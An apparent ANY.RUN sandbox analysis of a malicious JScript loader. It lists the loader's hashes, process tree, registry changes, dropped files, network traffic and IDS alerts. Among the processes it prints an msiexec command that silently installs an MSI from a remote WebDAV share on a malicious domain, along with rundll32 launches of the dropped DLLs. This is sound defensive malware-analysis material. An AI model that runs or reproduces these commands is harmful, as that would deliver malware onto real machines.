| File name: | 93f7e95461c18aee7b56651069104710c76f9e3d6543a0b3248a21b236859d99.js |
| Full analysis: | https://app.any.run/tasks/46a46714-3371-455a-b335-f96d06394090 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | March 22, 2024, 16:12:51 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (519), with CRLF line terminators |
| MD5: | B6C851921B9805BE8C8B9FD3B100035E |
| SHA1: | 9B1826525C063FBB7BF942FB8D7C9EEB12363E1C |
| SHA256: | 93F7E95461C18AEE7B56651069104710C76F9E3D6543A0B3248A21B236859D99 |
| SSDEEP: | 12288:FoCHz5t/b1PhODnPd/Zq5OrmzvdGJUEfu9SVxpipqPJn:Fp5fMDnP9ocrmzVsUYudwPJn |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 776 | C:\Windows\syswow64\MsiExec.exe -Embedding 7FA973E5C7AF18203EEDB5F5E78FC51C | C:\Windows\SysWOW64\msiexec.exe | — | msiexec.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2436 | msiexec.exe /i \\sokingscrosshotel.com@80\share\upd.msi /qn | C:\Windows\System32\msiexec.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3676 | "C:\Windows\System32\rundll32.exe" C:\Users\admin\AppData\Local\besr\cr2.dll, vgml | C:\Windows\System32\rundll32.exe | rundll32.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4080 | rundll32.exe "C:\Users\admin\AppData\Roaming\Custom_update\Update_28166db2.dll", vgml | C:\Windows\System32\rundll32.exe | — | rundll32.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4732 | "C:\WINDOWS\Installer\MSI82CD.tmp" C:\Windows\System32\rundll32.exe C:\Users\admin\AppData\Local\besr\cr2.dll, vgml | C:\Windows\Installer\MSI82CD.tmp | — | msiexec.exe | |||||||||||
User: admin Company: Caphyon LTD Integrity Level: MEDIUM Description: File that launches another file Exit code: 0 Version: 19.1.0.0 Modules
| |||||||||||||||
| 4844 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\93f7e95461c18aee7b56651069104710c76f9e3d6543a0b3248a21b236859d99.js" | C:\Windows\System32\wscript.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 6132 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6412 | "C:\Windows\System32\rundll32.exe" C:\Users\admin\AppData\Local\besr\cr2.dll, vgml | C:\Windows\SysWOW64\rundll32.exe | — | MSI82CD.tmp | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.19041.746 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6984 | C:\WINDOWS\system32\msiexec.exe /V | C:\Windows\System32\msiexec.exe | services.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Exit code: 0 Version: 5.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (4844) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (4844) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (4844) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (4844) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (4844) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe |
| Operation: | write | Name: | JScriptSetScriptStateStarted |
Value: EF710E0000000000 | |||
| (PID) Process: | (6984) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (6984) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (6984) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (6984) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (6984) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000 |
| Operation: | write | Name: | Owner |
Value: 481B00003F6BFBE0737CDA01 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6984 | msiexec.exe | C:\WINDOWS\TEMP\~DF6123D6E71C2D1D1C.TMP | binary | |
MD5:5DED9863E70E1C6085544D7597669C4F | SHA256:EDD5949D487C9D7074B20598408182C9EB3BAA73B763EA25F9EF9FE0F4AA7C2E | |||
| 6984 | msiexec.exe | C:\WINDOWS\TEMP\~DF7AE81165705DC020.TMP | binary | |
MD5:5DED9863E70E1C6085544D7597669C4F | SHA256:EDD5949D487C9D7074B20598408182C9EB3BAA73B763EA25F9EF9FE0F4AA7C2E | |||
| 6984 | msiexec.exe | C:\WINDOWS\TEMP\~DFAA77E6C9583CE6B3.TMP | gmc | |
MD5:7A0478E0E5FC4FA692675B0F5F84F89A | SHA256:B4C8253EC0C142CE4D49F316604D7FF90BCAB918933BFFECE457E9157E038005 | |||
| 6984 | msiexec.exe | C:\WINDOWS\TEMP\~DF18E131C7C93129A5.TMP | gmc | |
MD5:BF619EAC0CDF3F68D496EA9344137E8B | SHA256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 | |||
| 6984 | msiexec.exe | C:\WINDOWS\Installer\MSI82CD.tmp | executable | |
MD5:B9545ED17695A32FACE8C3408A6A3553 | SHA256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A | |||
| 6984 | msiexec.exe | C:\WINDOWS\TEMP\~DF72D2CF458BD09E69.TMP | gmc | |
MD5:BF619EAC0CDF3F68D496EA9344137E8B | SHA256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 | |||
| 6984 | msiexec.exe | C:\WINDOWS\Installer\MSI8230.tmp | binary | |
MD5:AE30D2622686F229FB55EA428CEA34CD | SHA256:6AE3708E8A4807F8BF28D9462C37BF3F7956980A7BF8B688269950BA52B7F6B5 | |||
| 6984 | msiexec.exe | C:\WINDOWS\Installer\MSI81D1.tmp | executable | |
MD5:475D20C0EA477A35660E3F67ECF0A1DF | SHA256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD | |||
| 6984 | msiexec.exe | C:\WINDOWS\Installer\MSI8171.tmp | executable | |
MD5:475D20C0EA477A35660E3F67ECF0A1DF | SHA256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD | |||
| 6984 | msiexec.exe | C:\WINDOWS\Installer\e8018.msi | executable | |
MD5:A32536810939D2264C9030B8A1B12186 | SHA256:D83D5378F1BB37D1423207AD67F2F984F2D46BA9534194C344A051117C1E541F | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4844 | wscript.exe | OPTIONS | 200 | 193.106.174.218:80 | http://sokingscrosshotel.com/ | unknown | — | — | unknown |
— | — | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D | unknown | binary | 471 b | unknown |
6548 | svchost.exe | OPTIONS | 200 | 193.106.174.218:80 | http://sokingscrosshotel.com/share | unknown | — | — | unknown |
6548 | svchost.exe | PROPFIND | 207 | 193.106.174.218:80 | http://sokingscrosshotel.com/share | unknown | xml | 883 b | unknown |
5184 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | binary | 409 b | unknown |
6548 | svchost.exe | PROPFIND | 404 | 193.106.174.218:80 | http://sokingscrosshotel.com/share/Desktop.ini | unknown | html | 392 b | unknown |
3996 | svchost.exe | GET | 304 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | unknown |
6548 | svchost.exe | PROPFIND | 404 | 193.106.174.218:80 | http://sokingscrosshotel.com/share/Desktop.ini | unknown | html | 392 b | unknown |
3996 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown |
6548 | svchost.exe | PROPFIND | 207 | 193.106.174.218:80 | http://sokingscrosshotel.com/share | unknown | xml | 883 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 239.255.255.250:1900 | — | — | — | unknown |
3996 | svchost.exe | 20.190.159.68:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
1280 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4844 | wscript.exe | 193.106.174.218:80 | sokingscrosshotel.com | IQHost Ltd | RU | unknown |
6548 | svchost.exe | 193.106.174.218:80 | sokingscrosshotel.com | IQHost Ltd | RU | unknown |
3996 | svchost.exe | 20.190.159.64:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4840 | backgroundTaskHost.exe | 20.74.47.205:443 | arc.msn.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | unknown |
5184 | SIHClient.exe | 52.165.165.26:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
4840 | backgroundTaskHost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
5184 | SIHClient.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | unknown |
Domain | IP | Reputation |
|---|---|---|
sokingscrosshotel.com |
| unknown |
slscr.update.microsoft.com |
| whitelisted |
arc.msn.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
nexusrules.officeapps.live.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
4844 | wscript.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 26 |
6548 | svchost.exe | Misc activity | ET HUNTING Successful PROPFIND Response for Application Media Type |
6548 | svchost.exe | Misc activity | ET HUNTING Successful PROPFIND Response for Application Media Type |